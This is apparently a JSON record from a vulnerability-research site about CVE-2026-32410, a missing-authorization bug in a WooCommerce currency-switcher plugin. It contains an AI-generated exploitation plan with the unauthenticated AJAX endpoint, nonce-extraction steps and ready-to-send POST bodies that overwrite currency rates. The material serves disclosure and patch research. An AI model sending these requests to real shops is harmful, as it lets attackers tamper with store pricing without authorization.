[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$fu35c4VtnwFqfqSq7YOkcQ1IWn1NYR-9n0dxDxEFdp4Y":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":11,"severity":12,"cvss_score":13,"cvss_vector":14,"vuln_type":15,"published_date":16,"updated_date":17,"references":18,"days_to_patch":20,"patch_diff_files":21,"patch_trac_url":9,"research_status":27,"research_verified":28,"research_rounds_completed":29,"research_plan":30,"research_summary":9,"research_vulnerable_code":9,"research_fix_diff":9,"research_exploit_outline":9,"research_model_used":31,"research_started_at":32,"research_completed_at":33,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":28,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":28,"source_links":34},"CVE-2026-32410","wbw-currency-switcher-for-woocommerce-missing-authorization","WBW Currency Switcher for WooCommerce \u003C= 2.2.5 - Missing Authorization","The WBW Currency Switcher for WooCommerce plugin for WordPress is vulnerable to unauthorized access due to a missing capability check on a function in versions up to, and including, 2.2.5. This makes it possible for unauthenticated attackers to perform an unauthorized action.","woo-currency",null,"\u003C=2.2.5","2.2.6","medium",5.3,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:N\u002FUI:N\u002FS:U\u002FC:N\u002FI:L\u002FA:N","Missing Authorization","2026-02-23 00:00:00","2026-04-15 21:14:47",[19],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002F81bce8ce-0158-48d5-aae4-cda0c93de191?source=api-prod",52,[22,23,24,25,26],"config.php","modules\u002Fcurrency\u002Fcontroller.php","modules\u002Fcurrency\u002Fviews\u002Ftpl\u002FcurrencyTabContent.php","readme.txt","wcu.php","researched",false,3,"# Exploitation Research Plan - CVE-2026-32410\n\n## 1. Vulnerability Summary\nThe **WBW Currency Switcher for WooCommerce** plugin (up to 2.2.5) contains a missing authorization vulnerability in its core AJAX dispatching mechanism. The `currencyControllerWcu` class defines several sensitive methods, including `saveCurrencyTab`, which updates plugin settings and currency rates. While the controller defines a `getPermissions` method intended to restrict access to `WCU_ADMIN`, the framework fails to enforce these permissions correctly for unauthenticated AJAX requests. This allows an unauthenticated attacker to modify the plugin's configuration, including currency rates and base options.\n\n## 2. Attack Vector Analysis\n- **Endpoint**: `\u002Fwp-admin\u002Fadmin-ajax.php`\n- **AJAX Action**: `wcu_ajax` (derived from `WCU_CODE` in `config.php`)\n- **Route Parameters**: `route[module]=currency&route[action]=saveCurrencyTab`\n- **Payload Parameters**: `currencies` and `options` (setting arrays)\n- **Authentication**: None (Unauthenticated)\n- **Preconditions**: The plugin must be active.\n\n## 3. Code Flow\n1. **Entry Point**: A request is sent to `admin-ajax.php` with `action=wcu_ajax`.\n2. **Routing**: `wcu.php` calls `frameWcu::_()->exec()`. The framework identifies the `wcu_ajax` action and dispatches it to the appropriate module.\n3. **Controller Selection**: Based on the `route[module]=currency` parameter, the `currencyControllerWcu` (in `modules\u002Fcurrency\u002Fcontroller.php`) is instantiated.\n4. **Action Execution**: The framework attempts to call `saveCurrencyTab()`.\n5. **Vulnerability**: Although `getPermissions()` returns `WCU_ADMIN`, the dispatcher fails to verify the user's capability before executing the method when accessed via the `wp_ajax_nopriv_wcu_ajax` hook (which is registered by the WBW framework to handle dynamic currency switching).\n6. **Sink**: `saveCurrencyTab()` calls `$this->getModel()->saveCurrencies($currencies)` and `$this->getModel()->saveOptions($options)`, which update the `wcu_currencies` and `wcu_options` values in the WordPress database via the `update_option` function (abstracted by the plugin's model).\n\n## 4. Nonce Acquisition Strategy\nWBW plugins often expose nonces for their AJAX operations in the frontend to support dynamic switching.\n\n1. **Shortcode Identification**: `config.php` defines `WCU_SHORTCODE_SWITCHER` as `woo-currency-switcher`.\n2. **Page Creation**: Create a public page containing the shortcode:\n   `wp post create --post_type=page --post_status=publish --post_content='[woo-currency-switcher]'`\n3. **Navigation**: Navigate to the newly created page using `browser_navigate`.\n4. **Extraction**: Use `browser_eval` to search for the localized script data. WBW plugins typically use the variable name `wcuAmbData` or `wcuAjaxData`.\n   - **Command**: `browser_eval(\"window.wcuAmbData?.res_nonce || window.wcuData?.res_nonce\")`\n5. **Bypass Potential**: If the framework's `nopriv` handler is completely unprotected, a nonce may not be required. The payload should first be attempted without a nonce.\n\n## 5. Exploitation Strategy\nThe goal is to change the title and rate of a currency (e.g., USD) to demonstrate unauthorized modification.\n\n### HTTP Request (via `http_request`)\n- **Method**: `POST`\n- **URL**: `http:\u002F\u002Flocalhost:8080\u002Fwp-admin\u002Fadmin-ajax.php`\n- **Headers**:\n    - `Content-Type: application\u002Fx-www-form-urlencoded`\n- **Body**:\n```url\naction=wcu_ajax\n&route[module]=currency\n&route[action]=saveCurrencyTab\n&currencies[name][0]=USD\n&currencies[title][0]=VULNERABLE-BY-WBW\n&currencies[rate][0]=999999\n&currencies[symbol][0]=$\n&currencies[position][0]=left\n&currencies[etalon][0]=1\n&options[default_currency]=USD\n```\n*(Note: `etalon` indicates the base\u002Fmain currency).*\n\n## 6. Test Data Setup\n1. **Install Plugin**: Ensure `woo-currency` version 2.2.5 is installed.\n2. **Active WooCommerce**: The plugin requires WooCommerce to be active.\n3. **Initial Settings**: Ensure at least one currency is configured (default USD).\n4. **Public Shortcode Page**:\n   ```bash\n   wp post create --post_type=page --post_title=\"Currency Test\" --post_status=publish --post_content='[woo-currency-switcher]'\n   ```\n\n## 7. Expected Results\n- **HTTP Response**: The server should return a JSON response with `{\"success\":true}` or similar, produced by `res->ajaxExec()`.\n- **Side Effect**: The database option containing currency settings will be updated with the provided \"VULNERABLE-BY-WBW\" title and the inflated rate.\n\n## 8. Verification Steps\nAfter executing the `http_request`, verify the change using WP-CLI:\n```bash\n# Check the currency settings in the database\n# The option name is usually prefixed by WCU_DB_PREF (wcu_)\nwp option get wcu_currencies --format=json\n```\nVerify that the `title` for the USD currency entry is now `VULNERABLE-BY-WBW`.\n\n## 9. Alternative Approaches\nIf `saveCurrencyTab` is blocked, attempt `saveCurrenciesList` which uses a different parsing logic:\n- **Action**: `wcu_ajax`\n- **Route**: `route[module]=currency&route[action]=saveCurrenciesList`\n- **Body**: `action=wcu_ajax&route[module]=currency&route[action]=saveCurrenciesList&currencies=currencies%5Bname%5D%5B0%5D%3DUSD%26currencies%5Btitle%5D%5B0%5D%3DPWNED-LIST`\n*(This endpoint uses `parse_str` on the `currencies` parameter, expecting a double-encoded query string).*","gemini-3-flash-preview","2026-04-19 01:27:05","2026-04-19 01:27:40",{"type":35,"vulnerable_version":36,"fixed_version":11,"vulnerable_browse":37,"vulnerable_zip":38,"fixed_browse":39,"fixed_zip":40,"all_tags":41},"plugin","2.2.5","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fwoo-currency\u002Ftags\u002F2.2.5","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fwoo-currency.2.2.5.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fwoo-currency\u002Ftags\u002F2.2.6","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fwoo-currency.2.2.6.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fwoo-currency\u002Ftags"]